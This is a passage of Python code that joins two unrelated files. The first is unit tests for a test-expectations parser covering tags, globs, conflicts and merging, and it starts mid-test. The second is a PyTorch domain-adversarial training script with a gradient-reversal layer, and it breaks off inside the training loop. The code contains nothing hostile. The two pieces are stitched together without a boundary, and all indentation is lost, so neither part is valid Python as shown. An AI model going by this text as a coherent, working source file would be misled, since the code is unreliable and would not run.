'crbug.com/23456 [ linux ] b1/s1* [ Failure ]\n'
'crbug.com/23456 [ mac ] b1/* [ Pass ]\n')
expectations = expectations_parser.TestExpectations(tags=['mac'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
def testIsTestRetryOnFailure(self):
raw_data = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure ]\n'
'# conflicts_allowed: true\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ RetryOnFailure ]\n'
'[ linux ] b1/s2 [ RetryOnFailure ]\n'
'crbug.com/24341 [ Linux ] b1/s3 [ Failure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'), (0,''))
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(
test='b1/s1', results={ResultType.Failure}, retry_on_failure=True,
is_slow_test=False, reason='crbug.com/23456',
tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass}, retry_on_failure=True,
is_slow_test=False, tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s3'),
Expectation(
test='b1/s3', results={ResultType.Failure}, retry_on_failure=False,
is_slow_test=False, reason='crbug.com/24341', tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s4'),
Expectation(
test='b1/s4', results={ResultType.Pass}, retry_on_failure=False,
is_slow_test=False))
def testMergeExpectationsUsingUnionResolution(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ] # c1\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure Slow ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass ] # c2\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(raw_data2)
self.assertEqual(ret, 0)
test_exp1.merge_test_expectations(test_exp2)
self.assertEqual(sorted(test_exp1.tags), ['intel', 'linux'])
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2',
results={ResultType.Pass, ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431 crbug.com/2432',
trailing_comments=' # c1\n # c2\n',
tags={'linux', 'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s1'),
Expectation(
test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s3'),
Expectation(
test='b1/s3', results={ResultType.Failure},
retry_on_failure=False, is_slow_test=False,
tags={'linux'}))
self.assertEqual(test_exp1.expectations_for('b1/s5'),
Expectation(
test='b1/s5', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=True,
reason='crbug.com/2431 crbug.com/2432',
tags={'linux', 'intel'}))
def testResolutionReturnedFromExpectationsFor(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure Slow ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass Slow ]\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
raw_data3 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'# conflict_resolution: OVERRIDE\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431', tags={'linux'},
conflict_resolution=ConflictResolutionTypes.UNION
))
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(
raw_data2,
conflict_resolution = ConflictResolutionTypes.OVERRIDE)
self.assertEqual(ret, 0)
self.assertEqual(test_exp2.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=True,
reason='crbug.com/2432', tags={'intel'},
conflict_resolution=ConflictResolutionTypes.OVERRIDE
))
test_exp3 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp3.parse_tagged_list(raw_data3)
self.assertEqual(ret, 0)
self.assertEqual(test_exp3.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431', tags={'linux'},
conflict_resolution=ConflictResolutionTypes.OVERRIDE
))
def testMergeExpectationsUsingOverrideResolution(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure Slow ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass Slow ]\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(
raw_data2, conflict_resolution=ConflictResolutionTypes.OVERRIDE)
self.assertEqual(ret, 0)
test_exp1.merge_test_expectations(test_exp2)
self.assertEqual(sorted(test_exp1.tags), ['intel', 'linux'])
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=True,
reason='crbug.com/2432', tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s3'),
Expectation(test='b1/s3', results={ResultType.Failure},
retry_on_failure=False, is_slow_test=False,
tags={'linux'}))
self.assertEqual(test_exp1.expectations_for('b1/s5'),
Expectation(test='b1/s5', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431',
tags={'intel'}))
def testIsNotTestRetryOnFailureUsingEscapedGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/\* [ RetryOnFailure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'),
(0, ''))
self.assertIn('b1/*', test_expectations.individual_exps)
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=False))
def testIsTestRetryOnFailureUsingGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/* [ RetryOnFailure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'),
(0, ''))
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/23456', tags={'linux'}))
def testGlobsCanExistInMiddleofPatternUsingEscapeCharacter(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/\*/c [ RetryOnFailure ]\n')
expectations_parser.TaggedTestListParser(raw_data)
def testGlobsCanOnlyHaveStarInEnd(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/*/c [ RetryOnFailure ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testGlobsCanOnlyHaveStarInEnd1(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] */c [ RetryOnFailure ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testUseIncorrectvalueForConflictsAllowedDescriptor(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure Skip ]
# conflicts_allowed: Unknown
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(test_expectations, 'test.txt')
self.assertEqual("5: Unrecognized value 'unknown' "
"given for conflicts_allowed descriptor", msg)
def testConflictsInTestExpectation(self):
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
'# tags: [ mac win linux ]\n'
'# tags: [ intel amd nvidia ]\n'
'# tags: [ debug release ]\n'
'# conflicts_allowed: False\n'
'# results: [ Failure Skip RetryOnFailure ]\n'
'[ intel win ] a/b/c/* [ Failure ]\n'
'[ intel win debug ] a/b/c/* [ Skip ]\n'
'[ intel ] a/b/c/* [ Failure ]\n'
'[ amd mac ] a/b [ RetryOnFailure ]\n'
'[ mac ] a/b [ Skip ]\n'
'[ amd mac ] a/b/c [ Failure ]\n'
'[ intel mac ] a/b/c [ Failure ]\n', 'test.txt')
self.assertIn("Found conflicts for pattern a/b/c/* in test.txt:",
errors)
self.assertIn('line 6 conflicts with line 7', errors)
self.assertIn('line 6 conflicts with line 8', errors)
self.assertIn('line 7 conflicts with line 8', errors)
self.assertIn("Found conflicts for pattern a/b in test.txt:", errors)
self.assertIn('line 9 conflicts with line 10', errors)
self.assertNotIn("Found conflicts for pattern a/b/c in test.txt:",
errors)
def testFileNameExcludedFromErrorMessageForExpectationConflicts(self):
test_expectations = '''# tags: [ mac ]
# tags: [ intel ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ mac ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(test_expectations)
self.assertIn("Found conflicts for pattern a/b/c/d:", errors)
def testConflictsUsingUserDefinedTagsConflictFunction(self):
test_expectations = '''# tags: [ win win7 ]
# results: [ Failure ]
[ win ] a/b/c/d [ Failure ]
[ win7 ] a/b/c/d [ Failure ]
'''
map_child_tag_to_parent_tag = {'win7': 'win'}
tags_conflict = lambda t1, t2: (
t1 != t2 and t1 != map_child_tag_to_parent_tag.get(t2,t2) and
t2 != map_child_tag_to_parent_tag.get(t1,t1))
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
test_expectations, tags_conflict=tags_conflict)
self.assertIn("Found conflicts for pattern a/b/c/d:", errors)
def testNoCollisionInTestExpectations(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure ]
# conflicts_allowed: False
[ intel debug ] a/b/c/d [ Failure ]
[ nvidia debug ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(errors)
def testConflictsAllowedIsSetToTrue(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure ]
# conflicts_allowed: True
[ intel debug ] a/b/c/d [ Failure ]
[ intel ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
def testConflictFoundRegardlessOfTagCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ Intel ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
ret, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertTrue(ret)
self.assertIn('Found conflicts for pattern a/b/c/d', msg)
def testConflictNotFoundRegardlessOfTagCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ amd ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
def testExpectationPatternIsBroken(self):
test_expectations = '# results: [ Failure ]\na/\* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/*')
def testExpectationPatternIsNotBroken(self):
test_expectations = '# results: [ Failure ]\na/b/d [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/b/d')
def testExpectationWithGlobIsBroken(self):
test_expectations = '# results: [ Failure ]\na/b/d* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c/d', 'a/b', 'a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/b/d*')
def testExpectationWithGlobIsNotBroken(self):
test_expectations = '# results: [ Failure ]\na/b* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b'])
self.assertFalse(broken_expectations)
def testNonDeclaredSystemConditionTagRaisesException(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
with self.assertRaises(ValueError) as context:
expectations.set_tags(['Unknown'], raise_ex_for_bad_tags=True)
self.assertEqual(str(context.exception),
'Tag unknown is not declared in the expectations file and has not '
'been explicitly ignored by the test. There may have been a typo '
'in the expectations file. Please make sure the aforementioned tag '
'is declared at the top of the expectations file.')
def testNonDeclaredSystemConditionTagsRaisesException_PluralCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
with self.assertRaises(ValueError) as context:
expectations.set_tags(['Unknown', 'linux', 'nVidia', 'nvidia-0x1010'],
raise_ex_for_bad_tags=True)
self.assertEqual(str(context.exception),
'Tags linux, nvidia-0x1010 and unknown are not declared in the '
'expectations file and have not been explicitly ignored by the '
'test. There may have been a typo in the expectations file. Please '
'make sure the aforementioned tags are declared at the top of the '
'expectations file.')
def testIgnoredTags(self):
test_expectations = """# tags: [ foo ]
# results: [ Failure ]
"""
expectations = expectations_parser.TestExpectations(
ignored_tags=['ignored'])
_, msg = expectations.parse_tagged_list(test_expectations, 'test.txt')
self.assertFalse(msg)
expectations.set_tags(['ignored'], raise_ex_for_bad_tags=True)
def testDeclaredSystemConditionTagsDontRaiseAnException(self):
test_expectations = '''# tags: [ InTel AMD nvidia nvidia-0x1010 ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
expectations.set_tags(['win', 'nVidia', 'nvidia-0x1010'],
raise_ex_for_bad_tags=True)
def testMultipleReasonsForExpectation(self):
test_expectations = '''# results: [ Failure ]
skbug.com/111 crbug.com/wpt/222 skbug.com/hello/333 crbug.com/444 test [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
exp = expectations.expectations_for('test')
self.assertEqual(exp.reason, 'skbug.com/111 crbug.com/wpt/222 skbug.com/hello/333 crbug.com/444')
def testExpectationToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=True,
retry_on_failure=True)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] test.html?\* [ Failure Pass RetryOnFailure Slow ]')
def testExpectationWithSpaceInTestNameToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?Foo Bar', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=False,
retry_on_failure=False)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] test.html?Foo%20Bar [ Failure Pass ]')
def testExpectationWithPercentInTestNameToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?Foo%Bar', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=False,
retry_on_failure=False)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] test.html?Foo%25Bar [ Failure Pass ]')
def testGlobExpectationToString(self):
exp = Expectation(reason='crbug.com/123', test='a/*/test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=True,
retry_on_failure=True, is_glob=True)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] a/\*/test.html?* [ Failure Pass RetryOnFailure Slow ]')
def testExpectationToStringUsingRawSpecifiers(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
assert not ret, errors
self.assertEqual(test_exps.individual_exps['test.html?*'][0].to_string(),
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]')
self.assertEqual(test_exps.glob_exps['test.*.*'][0].to_string(),
'[ NVIDIA ] test.\*.* [ Slow ] # hello world')
def testExpectationToStringAfterRenamingTest(self):
exp = Expectation(reason='crbug.com/123', test='test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, raw_tags=['iNteL'],
raw_results=['Failure', 'Pass'])
exp.test = 'a/*/test.html?*'
self.assertEqual(exp.to_string(), 'crbug.com/123 [ iNteL ] a/\*/test.html?\* [ Failure Pass ]')
def testAddExpectationsToExpectation(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Pass Failure ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
test_exps.individual_exps['test.html?*'][0].add_expectations(
{ResultType.Timeout}, reason='crbug.com/123 crbug.com/124')
assert not ret, errors
self.assertEqual(test_exps.individual_exps['test.html?*'][0].results,
frozenset([ResultType.Pass, ResultType.Failure,
ResultType.Timeout]))
self.assertEqual(test_exps.individual_exps['test.html?*'][0].reason,
'crbug.com/123 crbug.com/124')
def testAddingExistingExpectationsDoesntChangeRawResults(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test.html?\* [ Failure Pass ]\n'
'[ NVIDIA ] test.\*.* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
test_exps.individual_exps['test.html?*'][0].add_expectations(
{ResultType.Failure}, reason='crbug.com/124')
assert not ret, errors
self.assertIn('[ Failure Pass ]',
test_exps.individual_exps['test.html?*'][0].to_string())
def testTopDownOrderMaintainedForNonGlobExps(self):
raw_expectations = (
'# tags: [ NVIDIA intel ]\n'
'# results: [ Failure Pass Slow ]\n'
'crbug.com/123 [ iNteL ] test1 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test2 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test8 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test9 [ Pass Failure ]\n'
'crbug.com/123 [ iNteL ] test5 [ Pass Failure ]\n'
'[ NVIDIA ] test.\* [ Slow ] # hello world\n')
test_exps = TestExpectations()
ret, errors = test_exps.parse_tagged_list(raw_expectations)
assert not ret, errors
self.assertEqual(list(test_exps.individual_exps),
['test1','test2','test8', 'test9', 'test5', 'test.*'])
#!/usr/bin/python
import sys
from os.path import join, exists, dirname
import random
import numpy as np
from numpy.random import randint, choice
from sklearn.datasets import load_svmlight_file
from torch.autograd import Function, Variable
import torch.nn as nn
import torch.optim as optim
import torch
from torch import FloatTensor
from uda_common import read_feature_groups, read_feature_lookup
# the concepts here come from: https://github.com/fungtion/DANN/blob/master/models/model.py
class ReverseLayerF(Function):
@staticmethod
def forward(ctx, x, alpha):
ctx.alpha = alpha
return x.view_as(x)
@staticmethod
def backward(ctx, grad_output):
# Totally random:
# output = Variable(torch.randn(grad_output.shape).cuda()) + grad_output * 0 # grad_output.neg() * ctx.alpha
# zero (ignores domain)
# output = 0 * grad_output
# reversed (default)
output = grad_output.neg() * ctx.alpha
# print("Input grad is %s, output grad is %s" % (grad_output.data.cpu().numpy()[:10], output.data.cpu().numpy()[:10]))
return output, None
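# A minimal usage sketch (shapes illustrative): the layer is the identity on
# the forward pass but multiplies incoming gradients by -alpha on the way
# back, so the feature extractor is trained to confuse the domain classifier:
#   feat = feature_extractor(x)              # (batch, num_features)
#   rev = ReverseLayerF.apply(feat, alpha)   # forward: identity
#   domain_pred = domain_classifier(rev)     # backward: grads * (-alpha)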
# Instead of this, may be able to just regularize by forcing off-diagonal to zero
# didn't work bc/ of memory issues
class StraightThroughLayer(nn.Module):
def __init__(self, input_features):
super(StraightThroughLayer, self).__init__()
self.vector = nn.Parameter( torch.randn(1, input_features) )
#self.add_module('pass-through vector', self.vector)
def forward(self, input_data):
# output = input_data * self.vector
output = torch.mul(input_data, self.vector)
return output
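# In effect the layer learns a per-feature gate: weights pushed to (near)
# zero switch the corresponding input feature off, which is what the zero /
# near-zero counts printed in main() below measure.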
class PivotLearnerModel(nn.Module):
def __init__(self, input_features):
super(PivotLearnerModel, self).__init__()
# Feature takes you from input to the "representation"
# self.feature = nn.Sequential()
# straight through layer just does an element-wise product with a weight vector
num_features = input_features
# num_features = 200
# self.vector = nn.Parameter( torch.randn(1, input_features) )
self.feature = nn.Sequential()
self.feature.add_module('input_layer', StraightThroughLayer(input_features))
# self.feature.add_module('feature_layer', nn.Linear(input_features, num_features))
self.feature.add_module('relu', nn.ReLU(True))
# Standard feed forward layer:
# num_features = 200
# self.feature.add_module('input_layer', nn.Linear(input_features, num_features))
# self.feature.add_module('relu', nn.ReLU(True))
# task_classifier maps from a feature representation to a task prediction
self.task_classifier = nn.Sequential()
self.task_classifier.add_module('task_binary', nn.Linear(num_features, 1))
self.task_classifier.add_module('task_sigmoid', nn.Sigmoid())
# domain classifier maps from a feature representation to a domain prediction
self.domain_classifier = nn.Sequential()
# hidden_nodes = 100
# self.domain_classifier.add_module('domain_hidden', nn.Linear(num_features, hidden_nodes, bias=False))
# self.domain_classifier.add_module('relu', nn.ReLU(True))
self.domain_classifier.add_module('domain_classifier', nn.Linear(num_features, 1, bias=False))
# # self.domain_classifier.add_module('domain_predict', nn.Linear(100, 1))
self.domain_classifier.add_module('domain_sigmoid', nn.Sigmoid())
# self.domain_classifier2 = nn.Sequential()
# self.domain_classifier2.add_module('domain_linear', nn.Linear(num_features, 1, bias=False))
# # # self.domain_classifier.add_module('domain_predict', nn.Linear(100, 1))
# self.domain_classifier2.add_module('domain_sigmoid', nn.Sigmoid())
def forward(self, input_data, alpha):
feature = self.feature(input_data)
# feature = input_data * self.vector
task_prediction = self.task_classifier(feature)
# Get domain prediction
reverse_feature = ReverseLayerF.apply(feature, alpha)
domain_prediction = self.domain_classifier(reverse_feature)
# Only domain predictor 1 is reversed
# domain_prediction2 = self.domain_classifier2(feature)
return task_prediction, domain_prediction #(domain_prediction, domain_prediction2)
def main(args):
if len(args) < 1:
sys.stderr.write("Required arguments: <data file> [backward True|False]\n")
sys.exit(-1)
device = 'cpu'
if torch.cuda.is_available():
device = 'cuda'
    if len(args) > 1:
        # bool('False') would be True, so parse the flag by comparing strings:
        backward = args[1].lower() == 'true'
        print("Direction is backward=%s based on args=%s" % (backward, args[1]))
    else:
        backward = False
        print("Direction is forward by default")
# Read the data:
goal_ind = 2
domain_weight = 1.0
reg_weight = 0.1
lr = 0.01
epochs = 1000
batch_size = 50
sys.stderr.write("Reading source data from %s\n" % (args[0]))
all_X, all_y = load_svmlight_file(args[0])
# y is 1,2 by default, map to 0,1 for sigmoid training
all_y -= 1 # 0/1
# continue to -1/1 for softmargin training:
# all_y *= 2 # 0/2
# all_y -= 1 # -1/1
num_instances, num_feats = all_X.shape
domain_map = read_feature_groups(join(dirname(args[0]), 'reduced-feature-groups.txt'))
domain_inds = domain_map['Domain']
feature_map = read_feature_lookup(join(dirname(args[0]), 'reduced-features-lookup.txt'))
direction = 1 if backward else 0
sys.stderr.write("using domain %s as source, %s as target\n" %
(feature_map[domain_inds[direction]],feature_map[domain_inds[1-direction]]))
source_instance_inds = np.where(all_X[:,domain_inds[direction]].toarray() > 0)[0]
X_source = all_X[source_instance_inds,:]
X_source[:, domain_inds[direction]] = 0
X_source[:, domain_inds[1-direction]] = 0
y_source = all_y[source_instance_inds]
num_source_instances = X_source.shape[0]
num_train_instances = int(X_source.shape[0] * 0.8)
X_task_train = X_source[:num_train_instances,:]
y_task_train = y_source[:num_train_instances]
X_task_valid = X_source[num_train_instances:, :]
y_task_valid = y_source[num_train_instances:]
target_instance_inds = np.where(all_X[:,domain_inds[1-direction]].toarray() > 0)[0]
X_target = all_X[target_instance_inds,:]
X_target[:, domain_inds[direction]] = 0
X_target[:, domain_inds[1-direction]] = 0
num_target_train = int(X_target.shape[0] * 0.8)
X_target_train = X_target[:num_target_train,:]
# y_target_train = y_target[:num_target_train]
X_target_valid = X_target[num_target_train:, :]
# y_target_dev = y_target[num_target_train:]
# y_test = all_y[target_instance_inds]
num_target_instances = X_target_train.shape[0]
model = PivotLearnerModel(num_feats).to(device)
task_loss_fn = nn.BCELoss()
domain_loss_fn = nn.BCELoss()
l1_loss = nn.L1Loss()
#task_loss_fn.cuda()
# domain_loss_fn.cuda()
# l1_loss.cuda()
optimizer = optim.Adam(model.parameters())
# optimizer = optim.SGD(model.parameters(), lr=lr)
# weights = model.vector
try:
weights = model.feature.input_layer.vector
print("Before training:")
print("Min (abs) weight: %f" % (torch.abs(weights).min()))
print("Max (abs) weight: %f" % (torch.abs(weights).max()))
print("Ave weight: %f" % (torch.abs(weights).mean()))
num_zeros = (weights.data==0).sum()
near_zeros = (torch.abs(weights.data)<0.000001).sum()
print("Zeros=%d, near-zeros=%d" % (num_zeros, near_zeros))
except AttributeError:  # model has no straight-through layer to inspect
pass
# Main training loop
inds = np.arange(num_train_instances)
for epoch in range(epochs):
epoch_loss = 0
model.train()
# Do a training epoch:
for batch in range(1 + (num_train_instances // batch_size)):
model.zero_grad()
start_ind = batch * batch_size
if start_ind >= num_train_instances:
# This happens when the number of instances is evenly divisible by the batch size (always the case when batch_size=1).
break
end_ind = num_train_instances if start_ind + batch_size >= num_train_instances else start_ind+batch_size
this_batch_size = end_ind - start_ind
## Gradually increase the strength of the domain-adversarial term (this alpha is fed to the gradient reversal layer, not the L1 regularizer)
ave_ind = start_ind + this_batch_size // 2
p = float(ave_ind + epoch * num_train_instances*2) / (epochs * num_train_instances*2)
alpha = 2. / (1. + np.exp(-10 * p)) - 1
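# This is the standard DANN annealing schedule (Ganin & Lempitsky, 2015):
# alpha rises smoothly from 0 at the start of training towards 1 at the end,
# so the domain-adversarial gradient is weak early on and full-strength late.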
source_batch = FloatTensor(X_task_train[start_ind:end_ind,:].toarray()).to(device) # read input
source_task_labels = torch.unsqueeze(FloatTensor(y_task_train[start_ind:end_ind]).to(device), 1) # task labels, shape (batch, 1) to match task_out
source_domain_labels = torch.zeros(this_batch_size,1, device=device) # set to 0
# Get the task loss and domain loss for the source instance:
task_out, task_domain_out = model.forward(source_batch, alpha)
task_loss = task_loss_fn(task_out, source_task_labels)
domain_loss = domain_loss_fn(task_domain_out, source_domain_labels)
# domain2_loss = domain_loss_fn(task_domain_out[1], source_domain_labels)
try:
weights = model.feature.input_layer.vector
reg_term = l1_loss(weights, torch.zeros_like(weights, device=device))
except AttributeError:  # no straight-through layer, so nothing to regularize
reg_term = 0
# Randomly select a matching number of target instances:
target_inds = choice(num_target_instances, this_batch_size, replace=False)
target_batch = FloatTensor(X_target_train[target_inds,:].toarray()).to(device) # read input
